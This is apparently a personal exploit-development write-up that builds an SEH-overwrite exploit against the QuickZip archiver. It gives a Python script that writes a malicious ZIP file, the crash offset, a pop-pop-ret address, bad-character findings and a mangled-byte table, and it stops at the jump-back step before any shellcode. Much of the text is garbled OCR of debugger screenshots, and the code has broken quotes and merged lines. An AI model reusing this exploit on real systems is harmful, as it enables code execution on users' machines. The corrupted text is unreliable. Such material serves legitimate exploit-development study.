SEH + Egghunter QuickZip Exploit

Initial Script

#!/usr/bin/python
header_1 = (“\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″”\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00”)
header_2 = (“\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00″”\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00″”\x24\x00\x00\x00\x00\x00\x00\x00”)
header_3 = (“\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00″”\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00”)
payload = “A” * 4064payload += “.txt”
exploit = header_1 + payload + header_2 + payload + header_3
myfile = open(‘kalisa.zip’,’w’);myfile.write(exploit);myfile.close()

Crash

Open the zip file, attach immunity, try to extract (where the crash happens)

Offset

?C812FD3 ?C812FD4 ?C812FD5 ?C812FD8 ?C812FDQ ?C812FEØ ?C812FE3 ?C812FE6 ?C812FE9 ?C812FEC ?C812FEF ?C812FF1 ?C812FF4 ?C812FF? ?C812FFB ?C812FFE 713813004 71381300? ?C813ØØB ?C813ØØD 713813013 713813014 srø en t Qddress 00705000 00705010 00705020 00705030 00705040 00705050 00705060 00705070 00705080 00705090 ØØ?Ø5ØBØ ØØ?Ø5ØDØ ØØ?Ø5ØEØ ØØ?Ø5ØFØ 00705100 00705110 00705120 00 00705130 00705140 00705150 00705160 00705170 00705180 00705190 00705190 ØØ?Ø51BØ ØØ?Ø51DØ ØØ?Ø51EØ 00 e ØØ?Ø51FØ 00705200 00705210 C2 1000 85FF ØF8E 5E8EFFFF 8B55 FC 8955 oc OFB?16 8B?D F8 891439 8811 8B?8 OC OFB6D2 66 :8B145? 66 :3B16 ØF85 78870300 8B5Ø 08 66:8B5Q 04 3819 ØF84 76870300 46 46 Hex dump POP LEQUE RETN IØ EDI *EDI JLE 132 . ?C8ØBE3E MOU PIR SS: [EBP-4] MOU PIR SS: MOUZ* ED*WORD PIR DS: [ESI] EDI PIR SS: [EBP-8] DL. BYTE PIR DS: MOU BYTE PIR DS: EDI DWORD PIR DS: MOUZ* DL D*.WORD PIR DS: [EDI D*.WORD PIR DS: [ESI] JNZ 132 . ED*.DWORD PIR DS: B*.WORD PIR DS: CHP BYTE PIR DS: JE 132 . Registers (FPU) EC* ESP EBP ES 1 EDI EIP ØØ12F6FØ ooøøøøøø ØØ5ØBQ14 ØØEC535Ø ØØ12F6EC ØØ12F?4Ø 00420914 ?C812FD3 c P z s r o ES cs ss DS FS GS 0023 ØØIB 0023 0023 003 B 0 QuickZip.ØØ5ØBQ14 QuickZip.ØØ42ØQ14 132 . ?C812FD3 32bit Ø<FFFFFFFF) 32bit Ø<FFFFFFFF) 32bit Ø<FFFFFFFF) 32bit Ø<FFFFFFFF) 32bit NULL ERROR_SUCCESS (ØØØØØØØØ) EFL Last Em• 00200202 DØ 50 DD 04 52 20 30 30 04 54 28 68 88 IØ 38 24 98 49 86 CB DE 34 75 20 31 31 94 94 IØ 94 23 94 94 94 96 94 95 41 41 40 EB cc DF 76 24 49 61 32 32 40 EB 40 20 40 15 40 ID 40 19 40 EC 40 40 EB kerne132 . ?C812FD3 from ntd11.Rt IRaiseException QuickZip.ØØ5ØBQ14 QuickZip.ØØ4Ø512C EØ 43 40 74 74 33 33 01 01 01 01 64 48 El 01 03 66 69 20 34 34 EØ IØ 60 IØ 40 80 BØ 13 98 30 35 35 03 33 66 41 40 40 CF 61 40 65 30 36 36 IØ EB 18 IF 20 15 28 30 19 38 EC 40 48 E4 20 30 01 01 01 01 34 02 01 BØ CD 02 04 45 65 30 38 38 EØ EØ IØ IØ 60 60 DØ IØ 40 40 80 80 BØ BØ use BF CE 72 72 30 39 39 03 03 33 33 66 66 FE 41 40 40 DB 40 49 72 72 30 41 40 41 EB EB IF IF 15 15 ED 19 EC EC 14 43 30 42 42 01 01 01 01 01 01 01 02 BØ 94 03 03 66 72 72 30 43 43 IØ 30 88 30 40 30 30 30 30 60 30 68 30 50 20 44 44 76 ØB 02 ØB ØB 05 ØB 3D ØB 76 ØB BI ØB ØE ØB 40 41 40 40 40 20 45 40 45 EB 30 20 30 15 30 ID 30 19 30 EC 30 30 EB 30 to ie..1e.@ie. opp. 00. PNö . DC raß11.Eoie.•... 85 . W4uc. . $@'Nan$+I nF . CO nF . Em•or. i 20 Runt ine errol•• at 00000000. i L 46 01234567899BCDEF 46 01234567899BCDEF 73 . . ctLö 01 Töe.. 73 01 höe.. 73 01 73 01 73 köe.. 73 8m.e300.e300.øeøs pJ R.GfR.$fR.ØöØs 73 YLö.VR.VR.ØöØs 73 ØØ12F6EC ØØ12F6FØ ØØ12F6F4 ØØ12F6F8 ØØ12F6FC ØØ12F?ØØ ØØ12F?Ø4 ØØ12F?Ø8 ØØ12F?ØC ØØ12F?1Ø ØØ12F?14 ØØ12F?18 ØØ12F?1C ØØ12F?2Ø ØØ12F?24 ØØ12F?28 ØØ12F?2C ØØ12F?3Ø ØØ12F?34 ØØ12F?38 ØØ12F?3C ØØ12F?4Ø ØØ12F?44 ØØ12F?48 ØØ12F?4C ØØ12F?5Ø ØØ12F?54 ØØ12F?58 ØØ12F?5C ØØ12F?6Ø ØØ12F?64 ØØ12F?68 ØØ12F%C FFFFFFF8 0 I-øn ØEEDFQDE 00000001 ooøøøøøø . . ?C812FD3 qlllP. to ØØ5ØBQ14 OllFFØ88 ØØEC535Ø PS 00. FFFFFFF8 0 00420914 ØØ12F9F4 ØØØØ2?8B 00000001 OllFFØ88 ØØ12F?68 ØØ5Ø4E3Ø ØØ12F?8C ØØ4Ø4CQD ØØ12F?68 ØØ12F9F4 ØØ5ØBQ14 ØEEDFQDE 00000001 ØØ12F?58 ØØ5ØBQ14 OllFFØ88 ØØEC535Ø FFFFFFF8 0 00420914 ØØ12F9F4 ØØØØØFE5 m. B. QuickZip.ØØ42ØQ14 i' ONP . il,e. RETURN to QuickZip.ØØ5Ø4E3Ø QuickZip.ØØ4Ø4CDC QuickZip.ØØ4Ø4CQD RETURN to QuickZip.ØØ5ØBQ14 QuickZip.ØØ4Ø512C I-øn qlllP. to QuickZip.ØØ5ØBQ14 QuickZip.ØØ4Ø512C PS 00. m. B. QuickZip.ØØ42ØQ14 tæt. Exception ØEEDFQDE - Shift+F?/F8/F9 pass except ion to program Paused

SEH Chain

Address 0012F?8C 0012F?98 0012F?R4 0012FR04 0012FR20 0012FB18 0012FB?O 0012FDF4 0012FEOO 0012FEB8 0012FF18 0012FF80 0012FF8C 0012FFB4 0012FFEO SE hand 1er QuickZ1p . • 00512184 QuickZ1p . • 9051229E QuickZ1p . • 0051232F QuickZ1p . • 00517082 QuickZ1p . • 00519010 QuickZ1p . • 00549407 QuickZ1p . • 006FC64D QuickZ1p . • 0046?94? QuickZ1p . • 00467958 user32 . ?E44048F user32 . ?E44048F QuickZ1p . • 0048?D5D QuickZ1p . • 0048?D96 QuickZ1p . • 00405290 kerne 132 . ?C839R90

After Shift + F9

004ØD565 004ØD56? . 89D9 004ØD569 . 83E1 004ØD56C 004ØD56E 004ØD56F . 89DØ 004ØD5?1 004ØD5?2 004ØD5?3 004ØD5?4 004ØD5?5 8D4Ø $ 53 004ØD5?8 004ØD5?9 . 56 004ØD5?Q . 8BDQ 004ØD5?C . 8BFØ 004ØD5?E . 8BC3 004ØD58Ø 004ØD585 004ØD586 004ØD588 004ØD58D 004ØD58F 004ØD591 004ØD592 004ØD59? 004ØD598 004ØD599 004ØD59Q $ 53 004ØD59C Address 00705000 00705010 00705020 00705030 00705040 00705050 00705060 00705070 00705080 00705090 OO?Ø5ØBØ OO?Ø5ØDØ OO?Ø5ØEØ OO?Ø5ØFØ 00705100 00705110 00705120 00705130 00705140 00705150 00705160 00705170 00705180 00705190 03 REP MOU AND REP MOUS DWORD PIR ES: [EDI ]DWORD PIR Registers (MM* ) EC*3 MOUS BYTE sros BYTE PIR POP POP POP REIN LEA PUSH PUSH CALL QuickZ1p . PUSH CALL QuickZ1p . POP CALL QuickZ1p . POP POP REIN MOU PIR ES: PIR DS:I ES : [EDI PIR Progress ESP EBP ESI EDI EIP 0012FQQC OOØØIØØE 0012F9?4 0012FBF4 0114C82C 00130000 004ØD565 C P z s 1 1 ES cs DS 0023 001B 0023 0023 003B . E8 F?84FFFF . 50 . 8BC3 . E8 EF86FFFF . 8BDØ . 8BC6 . 59 . E8 QDFFFFFF 8BCØ Hex dump "Qctx QuickZip.ØØ4ØD565 32bit O<FFFFFFFF) 32bit O<FFFFFFFF) 32bit O<FFFFFFFF) 32bit O<FFFFFFFF) 32bit INS *PE. GE*G) :cll :cll (OOØØØØCE) • 004ØD544 DO 50 04 52 20 30 30 04 54 28 68 88 49 86 CB DE 34 75 20 31 31 94 co 94 10 94 23 94 41 41 40 cc 76 24 49 61 32 32 40 40 20 40 15 40 ID 43 40 74 74 33 33 01 01 01 64 48 El 01 03 66 69 20 34 34 10 60 13 98 30 35 35 03 PUSH 41 8B 40 40 61 40 65 30 36 36 10 18 IF 20 15 28 co 20 30 01 01 01 34 02 01 CD 02 04 45 65 30 38 38 10 10 60 60 BF 9B CE 2B 72 72 30 39 39 03 03 41 8B 40 40 DB 40 49 72 72 30 41 40 41 IF IF 15 15 14 co 43 30 42 42 01 01 01 01 01 01 02 94 03 03 66 72 72 30 43 43 50 30 90 30 30 40 30 20 44 44 74 06 40 40 8B 20 8B 45 40 45 30 IF 30 15 30 30 PNö . DC hß11.Eoie.•... 00 85 . W4uc. . $@'Nan$+I nf . CO •—1 nf . Error. i 20 Runt ine error at 00000000. i L co 46 01234567899BCDEF 46 01234567899BCDEF 00 73 . . ctLö . mos 01 Tije.. 73 01 höe.. 73 01 73 use Shift+F?/F8/F9 0012F988 0012F98C 0012F99Ø 0012F994 0012F998 0012F99C 0012F9QØ 0012F9Q4 0012F9Q8 0012F9QC 0012F9BØ 0012F9B4 0012F9B8 0012F9BC 0012F9CØ 0012F9C4 0012F9C8 0012F9CC 0012F9DØ 0012F9D4 0012F9D8 0012F9DC 0012F9EØ OOE3443Ø ODII. 0054373B 0012FBFC 00543?DE 0012FBF4 OllFD4DØ OllFF5QØ OllFFØ9Ø OllFF168 0012FQ2C 0012FQ54 ?C9ØE92Ø OOØØQD?I OOEB?428 00411DB2 00000400 . . ooøøøøøø . . OOEC52B5 00000001 OOEB?428 00000001 0012FQ?4 to QuickZip.ØØ4ØD59? QuickZip.ØØ4ØD544 LickZip.ØØ5F3C3C RETURN to QuickZip.ØØ543?3B QuickZip.ØØ4ØD5?8 Pointer to next SEH record SE handler " . txt" " . TXT" " . txt" " . TXT" ntd11.?C9ØE92Ø "Top" RETURN to QuickZip.ØØ411DB2 "Top" Access u io lat ion when writing to to pass except ion to program CompareStringQ> Paused

Seh chain again

Address SE handler 0012F99Ø QuickZip.ØØ543?DE 0012FBFC 6B41396Q 41386941 CORRUPT ENTRY

Offset

Address 12 F99 0012FBFC 413 8 6 Q 41 S E han d le QuickZip . 543 ? DE 6 B41396 Q CORRUPT ENTRY root@kalisa: root.ßkalisa # locate pattern 口 t /usr/hin/msf—pattern 口 t /usr/share/metasploit—frarnework/tools/exploit/pattern 口 t . root.ßkalisa # /usr/share/metasploit—frarnework/tools/exploit/pattern 口 t . rh 〔 〕 Exact match at 口 t root.ßkalisa —g 6b41396a

EIP Control

Registers (FPO) ESP EBP ESI EDI EIP ooøøøøøø 42424242 ?C9Ø32BC ooøøøøøø 0012F5Q4 0012F5C4 ooøøøøøø ooøøøøøø 42424242 c P Z s r 1 1 ES cs DS GS 0023 001B 0023 0023 003B ntdll. 32bit 32bit 32bit 32bit 32bit NULL ?C9Ø32BC O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF) root@kalisa: lhome/kalisa/OSCE/vuln-apps/quickzip xocl header 1 — xocl xocl header 2 xocl xocl xocl header 3 xocl Address Hex dump 00705000 00705010 00705020 00705030 00705040 00705050 00705060 00705070 00705080 00705090 OO?Ø5ØBØ OO?Ø5ØDØ OO?Ø5ØEØ OO?Ø5ØFØ 00705100 00705110 00705120 00 00705130 00705140 00705150 00705160 00705170 00705180 00705190 DO 50 04 52 20 30 30 04 54 28 68 88 49 86 CB DE 34 75 20 31 31 94 co 94 10 94 23 94 41 41 40 cc 76 24 49 61 32 32 40 40 20 40 15 40 ID 43 40 74 74 33 33 01 01 01 64 48 El 01 03 66 69 20 34 34 10 60 13 98 30 35 35 03 41 8B 40 40 61 40 65 30 36 36 10 18 IF 20 15 28 co 20 30 01 01 01 34 02 01 CD 02 04 45 65 30 38 38 10 10 60 60 BF 9B CE 2B 72 72 30 39 39 03 03 41 8B 40 40 DB 40 49 72 72 30 41 40 41 IF IF 15 15 14 co 43 30 42 42 01 01 01 01 01 01 02 94 03 03 66 72 72 30 43 43 80 30 68 30 30 40 30 50 20 44 44 74 40 41 40 40 40 8B 20 8B 45 40 45 30 IF 30 15 30 30 00 . i@..i PNö .Hy DC 00 85 . 00 20 co 46 46 73 01 73 01 73 01 W4uc.u •—1 nfi Runt in at 0 012345 012345 Tije.. höe.. nseh = seh = junk = payload = offset payload " . txt" exploit header myfile = myfile.close "crash. + nseh + seh + junk 1 + payload + header 2 + payload + header 3 kalisa. zip' IT.,JI myfile. write (exploit) 26L, 16, g All 73 0012F6Ø8 0012F6ØC 0012F61Ø 0012F68C 0114C82C 00020024 Access u io lat ion when executing [42424242] - use Shift+F?/F8/F9 to pass except ion to program Paused

POP-POP-RET

OBQDFØØD 00407933 004ØEQ4C 004ØEBBØ 0041082C 0041C?43 0041C?84 0041DQ6C 004218FØ 00422?EF 00422833 00425631 0042CC6Q 0042F5CE 0042F5F9 0043ØBEC 0043ØCF1 00435133 004355F8 0043?DEE 0043?E18 OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD OBQDFØØD !mona seh [+] Results . OxØØ4Ø?a33 : OxØØ4Øea4c . OxØØ4ØebbØ : ox0041082c • ox0041c?43 • ox0041c?84 : OxØØ41da6c : OxØØ4218fØ : OxØØ422?ef : OxØØ42cc6a : OxØØ42f5ce : OxØØ42f5f9 : OxØØ43Øbec : OxØØ43Øcf1 : OxØØ4355f8 : OxØØ43?dee : OxØØ43?e18 : pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx ecx W W W W W W W W W W W W W W W W W W W W pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop pop e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp e bp W W W W W W W W W W W W W W W W W W W W ret ret ret ret ret ret ret ret ret ret ret ret ret ret ret ret ret ret ret ret ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • ox04 • startnull* startnull startnull startnull* startnull startnull startnull startnull startnull startnull* startnull startnull startnull startnull startnull startnull startnull startnull* asciiprint.ascii [QuickZip.exe] QSLR: False. Rebase: False. SafeSEH: [QuickZip.exe] QSLR: [QuickZip.exe] QSLR: ascii [QuickZip.exe] [QuickZip.exe] QSLR: [QuickZip.exe] QSLR: [QuickZip.exe] QSLR: [QuickZip.exe] QSLR: [QuickZip.exe] QSLR: False. False. QSLR: False. False. False. False. False. Rebase: False. Rebase: False. False. Rebase: Rebase: False. Rebase: False. Rebase: False. Rebase: False. Rebase: False. SafeSEH: False. SafeSEH: False. False. SafeSEH: SafeSEH: False. SafeSEH: False. SafeSEH: False. SafeSEH: False. SafeSEH: False. OS: False. OS: False. False. OS: OS: False. OS: False. OS: False. OS: False. OS: False. asciiprint.ascii [QuickZip.exe] QSLR: False. Rebase: False. SafeSEH: False. False. False. startnull* asc i iprint asc i alphanum» uppernum startnull* asc i iprint asc i alphanum» uppernum [QuickZip.exe] QSLR: False. QSLR: False. Rebase: False. SafeSEH: False. OS: QSLR: False. Rebase: False. SafeSEH: False. OS: QSLR: False. Rebase: False. SafeSEH: False. OS: QSLR: False. Rebase: False. SafeSEH: False. OS: QSLR: False. Rebase: False. SafeSEH: False. OS: [QuickZip.exe] QSLR: False. QSLR: False. Rebase: False. SafeSEH: False. OS: QSLR: False. Rebase: False. SafeSEH: False. OS: Rebase : False. False. False. False. False. Rebase : False. False. False. False. False. ...-1 (C: \Program Fill (C: \Program Fill .0— (C: \Progr (C: \Program Fill (C: \Program Fill (C: \Program Fill (C: \Program Fill (C: \Program Fill False. ...-1 SafeSEH: False (C: \Program Fill (C: \Program Fill (C: \Program Fill (C: \Program Fill (C: \Program Fill SafeSEH: False (C: \Program Fill (C: \Program Fill asciiprint.ascii [QuickZip.exe] QSLR: False. Rebase: False. SafeSEH: False. OS: False. ...-1 . Please wait while I'm processing Done. Only the first 20 pointers Found a total of 7973 pointers This mona. action took all remaining results and writing everything to file. are shown here. For more pointers. open seh.txt. 281000
offset = “A”*(298-4)nseh = “B”*4seh = “\x33\x28\x42\x00”      # pop pop ret 00422833junk = “A”* (4064-298-4)
payload = offset + nseh + seh + junkpayload += “.txt”

Pass the exception to the application

ntdll. 00422834 00422835 53 00422838 00422839 00422839 0042283C 00422843 00422845 0042284? 0042284C 00422851 00422856 00422858 00422859 0042285F 00422864 00422866 00422868 00422869 0042286F 00422874 00422875 004228% 004228?? 00422878 004228?F 00422881 00422883 Address 00705000 00705010 00705020 00705030 00705040 00705050 00705060 00705070 00705080 00705090 OO?Ø5ØBØ OO?Ø5ØDØ OO?Ø5ØEØ OO?Ø5ØFØ 00705100 00705110 00705120 00 00705130 00705140 00705150 00705160 00705170 00705180 00705190 > > . 74 oc . 8BDØ . 91 88BQ?1ØØ Hex dump . 59 C2 0400 . 56 . 8BD8 . 833D 88BQ?1ØØ . B2 01 . 91 E8Ø142ØØ . E8 9F2ØFEFF . 93 88BQ?1ØØ 8BF3 . 8BD6 . 91 88BQ?1ØØ . E8 44070000 . 85C0 . 8BD6 . 91 88BQ?1ØØ . E8 28050000 90 833D 88BQ?1ØØ POP POP REIN 4 PUSH PUSH CNP DWORD PIR DS: JNZ SHORT QuickZip.ØØ422856 Registers (3DNow! ) ESP EBP ESI EDI EIP ooøøøøøø 00422833 ?C9Ø32BC ooøøøøøø 0012F5BØ 0012F5DØ ooøøøøøø ooøøøøøø 00422833 ES 0023 CS 001B SS 0023 23 3B QuickZip.ØØ422833 ntd11.?C9Ø32BC QuickZip.ØØ422833 DL»I EQ*.DWORD DS: [4201E8] CALL QuickZ1p . • 004Ø48FØ MOU DWORD PIR DS : ESI *ESI CALL Qu JGE SHO CALL POP POP REIN NOP CNP DWO SHOR 32bit 32bit 32bit 32bit 32bit NULL O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF) Progress Progress Log Message . file(s) not found ERROR_FI 46 64 48 El 01 03 66 69 20 34 34 10 30 (OOØØØØCE) RETURN to ntd11.?C9Ø32Q8 "BBBB3<B" Pointer to next SE handler "BBBB3<B" RETURN to "BBBB3<B" DO 50 04 52 20 30 30 04 54 28 68 88 49 86 CB DE 34 75 20 31 31 94 co 94 10 94 94 41 41 40 cc 76 24 49 61 32 32 40 40 20 40 15 40 ID 43 40 74 74 33 33 01 01 01 13 98 30 35 35 80 MOU MOU 41 8B 40 40 61 40 65 30 36 36 10 18 IF 20 15 28 co 00 20 30 01 01 01 01 CD 02 04 45 65 30 38 38 10 10 30 30 9B CE 2B 72 72 30 39 39 80 80 40 DB 40 49 72 72 30 41 40 41 IF IF 15 15 94 03 03 66 72 72 30 43 43 80 30 20 30 30 30 20 44 44 74 83 40 40 8B 20 8B 45 40 45 30 IF 30 15 30 30 .1&.. . ene. urp PNö . DC hß11.Eoie.•... 00 85 . CO 20 co 46 46 73 01 73 01 73 01 73 Close 0012F5C4 0012F5C8 0012F5CC 0012F5DØ 0012F5D4 0012F5D8 0012F5DC 0012F5EØ 0012F5E4 0012F5E8 0012F5EC 0012F5FØ 0012F5F4 0012F5F8 0012F5FC 0012F6ØØ 0012F6Ø4 0012F6Ø8 0012F6ØC 0012F61Ø 0012F614 0012F618 0012F61C (3903298 012F698 012FBFC 012F6B4 V012F66C 0012F99Ø Y2É ?C9Ø32BC 0012FBFC 0012F68Ø 713903279 0012F698 0012FBFC 0012F6B4 0012F66C 00422833 00000001 0012F698 0012FBFC ?C92Q5QD 0012F698 0012FBFC 0012F6B4 0012F66C 00422833 ooøøøøøø . . 0012F698 0012F9QC ?C913BC1 SEH record 43 30 42 42 01 01 01 01 01 01 W4uc. . $@'Nan$+I nf . •—1 nf . Error. i Runt ine error at 00000000. i L 01234567899BCDEF 01234567899BCDEF . . ctLö . mos Tije.. höe.. QuickZip.ØØ422833 "BBBB3<B" RETURN to ntd11.?C92Q5QD "BBBB3<B" QuickZip.ØØ422833 RETURN to ntd11.?C913BC1 ntd11.?C9Ø3282 ntd11.?C9Ø324? ntd11.?C9ØFE??

Shift + F7 for 3 times and we will move to nseh which is ‘\x42’

0012FBFC 0012FBFD 0012FBFE 0012FBFF 0012FCØØ 0012FCØ2 0012FCØ3 0012FCØ6 0012FCØ8 0012FCØ9 0012FCØQ 0012FCØC 0012FCØE 0012FCØF 0012FC12 0012FC14 0012FC16 0012FC18 0012FC19 0012FCIQ 0012FCIB 0012FCID 0012FCIE 0012FC2Ø 0012FC22 0012FC24 0012FC26 0012FC28 0012FC2Q Address 00705000 00705010 00705020 00705030 00705040 00705050 00705060 00705070 00705080 00705090 OO?Ø5ØBØ OO?Ø5ØDØ OO?Ø5ØEØ OO?Ø5ØFØ 00705100 00705110 00705120 00 00705130 00705140 00705150 00705160 00705170 00705180 00705190 42 42 42 42 3328 42 0040 1200 50 1200 CD E? 0040 FC 1200 24 FE 1200 98 98 5B 0030 44 Hex dump INC INC INC INC INC QDD QDC ntdll. '?C90 Registers (3DNow! ) EBPDWORD PIR DS: BYTE DS: QLBYTE DS: PUSH CLD AL. BYTE DS: D*.DWORD PIR ES: [EDI ] QDD BYTE DS: Progress conman ESP EBP ESI EDI EIP PI ooøøøøøø 713903298 ?C9Ø32BC ooøøøøøø 0012F5CØ 0012F698 ooøøøøøø ooøøøøøø 0012FBFC ES 0023 CS 001B SS 0023 23 3B ntdll. ntdll. 32bit 32bit 32bit 32bit 32bit NULL 713903298 ?C9Ø32BC O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF) O<FFFFFFFF) CWDE CWDE POP QDD BYT ESP JEC*Z s Progress Log Message . file(s) not found ERROR_FI (OOØØØØCE) 46 SEH record DO 50 04 52 20 30 30 04 54 28 68 88 49 86 CB DE 34 75 20 31 31 94 co 94 10 94 94 41 41 40 cc 76 24 49 61 32 32 40 40 20 40 15 40 ID 43 40 74 74 33 33 01 01 01 64 48 El 01 03 66 69 20 34 34 10 30 13 98 30 35 35 80 QDD QDD QDD QDD QDD QDD 41 8B 40 40 61 40 65 30 36 36 10 18 IF 20 15 28 BYT BYT BYT BYT BYT BYT co 00 20 30 01 01 01 01 CD 02 04 45 65 30 38 38 10 10 30 30 9B CE 2B 72 72 30 39 39 80 80 40 DB 40 49 72 72 30 41 40 41 IF IF 15 15 43 30 42 42 01 01 01 01 01 01 94 03 03 66 72 72 30 43 43 80 30 20 30 30 30 .1&.. . ene. urp PNö . DC hß11.Eoie.•... 00 85 . CO 20 co 46 46 73 01 73 01 73 01 73 Close 0012F5D4 0012F5D8 0012F5DC 0012F5EØ 0012F5E4 0012F5E8 0012F5EC 0012F5FØ 0012F5F4 0012F5F8 0012F5FC 0012F6ØØ 0012F6Ø4 0012F6Ø8 0012F6ØC 0012F61Ø 0012F614 0012F618 0012F61C 0012F62Ø 0012F624 0012F628 0012F62C 012F66C 012F99Ø Y2É C9Ø32BC 012FBFC V012F68Ø 713903279 0012F698 0012FBFC 0012F6B4 0012F66C 00422833 00000001 0012F698 0012FBFC ?C92Q5QD 0012F698 0012FBFC 0012F6B4 0012F66C 00422833 ooøøøøøø . . 0012F698 0012F9QC ?C913BC1 ?FFD5ØØØ . P20 00000002 e... ooøøøøøø . . 00000001 Pointer to next SE handler "BBBB3<B" RETURN to "BBBB3<B" 20 44 44 74 83 40 40 8B 20 8B 45 40 45 30 IF 30 15 30 30 W4uc. . $@'Nan$+I nf . •—1 nf . Error. i Runt ine error at 00000000. i L 01234567899BCDEF 01234567899BCDEF . . ctLö . mos Tije.. höe.. QuickZip.ØØ422833 "BBBB3<B" RETURN to ntd11.?C92Q5QD "BBBB3<B" QuickZip.ØØ422833 RETURN to ntd11.?C913BC1 ntd11.?C9Ø3282 ntd11.?C9Ø324? ntd11.?C9ØFE??

Bad Characters

!mona bytearrayPython:for i in range(0,256): print(‘\\x%02X’ % i, end=”)Bash:for i in {0..255}; do printf “\\\x%02x” $i;done

offset = “A”*298nseh = “B”*4seh = “C”*4     bad = “\x00…..\xff”junk = “A”* (4064-298-4-4-len(bad))
payload = offset + nseh + seh + junkpayload += “.txt”

!mona bytearray!mona compare -f bytearray.bin -a [address where array begins]

Mangled Characters

\x80   C7\x81   FC\x82   E9\x83   E2\x84   E4\x85   E0\x86   E5\x87   E7\x88   EA\x89   EB\x8a   E8\x8b   EF\x8c   EE\x8d   EC\x8e   C4\x8f   C5\x90   C9\x91   E6\x92   C6\x93   F4\x94   F6\x95   F2\x96   FB\x97   F9\x98   FF\x99   D6\x9a   DC\x9b   A2\x9c   A3\x9d   A5\x9e   50\x9f   83
. 8Β4β 85D2 . 8Ββ8 . ΟΡ84 . 53 . 56 . 57 . 89C3 . 89D6 . 8Β79 . 8Β56 . 39CE 6EPDPPPP PTR DS : [Ερχ-4] RETN SHORT QuickZip.00405AC7 PTR QuickZip.00405800 ΕΙΜ ESP ΕΒΡ Ες Ι EDI ΕΙΡ ΡΙ # ! /usr/hin/ pyt.han Registeps headEE 1 — Ι: ΧΟΠ' headEE 2 0012Ρ9 headEE 3 DS : [EC#-4] DS: [ESl-4] 414141 414141 414141 ββ12Ρ9 CS C.lme > . 8Ββ3 Hex dump ESI EDI D"ORD PTR PTR ΕΙΜ Progress SHOR Pragress Lag ΕΙΜ ΕΙΜ ΡΟΡ ΡΟΡ ΡΟΡ Message . RETN affset. — 00405ρρι::: nseh = “ Addpess ββ12ΡΒββ ββ12ΡΒ1β ββ12ΡΒ2β ββ12ΡΒ3β ββ12ΡΒ4β ββ12ΡΒ5β ββ12ΡΒ6β ββ12ΡΒ7β ββ12ΡΒ8β ββ12ΡΒ9β ββ12ΡΒΒβ 0012PBCO 0012PBDO ββ12ΡΒΕβ ββ12ΡΒΡβ 0012PCOO 3(Β.ρηε. ρη ε. $ Ι ε. 0DlT 0012PC10 0012PC20 0012PC30 0012PC40 0012PC50 0012PC60 . 0DlT 0012PC70 . 89Ρβ . 8Β4Ε PC 8Β13 . Ε8 44D4PPPP SEh = ' xBh (4064-294-4-4) paylaad = affset. + nseh + SEh + jun]T paylaad += “ . CXC” file[s] not faund headEE 1 + paylaad + headEE 2 + paylaad + headEE 3 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 33 40 80 98 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 28 66 98 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 12 12 12 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 40 24 73 33 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 88 44 Μου 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 12 12 46 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 98 68 80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 98 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 12 12 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 71 CD 68 24 41 41 41 41 41 41 41 41 41 41 41 41 41 44 81 98 41 41 41 41 41 41 41 41 41 41 41 41 41 70 14 12 41 41 41 41 41 41 41 41 41 41 41 41 41 01 use ΗΗΗΗΗΗΗΗΗΗΗΗΗΗΗΗ 2 Shift+P7/P8/P9 ββ12Ρ994 ββ12Ρ998 0012P99C 0012P9AC ββ12Ρ9Ββ ββ12Ρ9Β4 ββ12Ρ9Β8 0012P9BC 0012P9CO 0012P9C4 0012P9C8 0012P9CC 0012P9DO 0012P9D4 0012P9D8 0012P9DC ββ12Ρ9Εβ ββ12Ρ9Ε4 ββ12Ρ9Ε8 0012P9EC pass except explait. t.EY.PY ΟΕ3443β 0543749 „012PBPC 005437DE ββ12ΡΒΡ4 0012PA2C 7C90E920 0DlT. 171 . RETIJRN to QuickZip.00543749 Pointel•' to next SEH pecopd SE handlel•' ntd11.7C90E920 QuickZip.0040D578 υ ίο lation "hen Untitled - Notepad \χΒ0 \χΒ1 \χΒ2 Ε9 \χΒ4 \χΒ5 ΕΟ \χΒ6 Ε5 \χΒ7 Ε7 \χΒΒ ΕΑ \χΒ9 ΕΒ \XBa ΕΒ peading [4141413D] - to Paused

JMP BACK

\9f is mangled to \x83 which is -125When we use nseh = \x71\x9f\x70\x9f, before the JMP

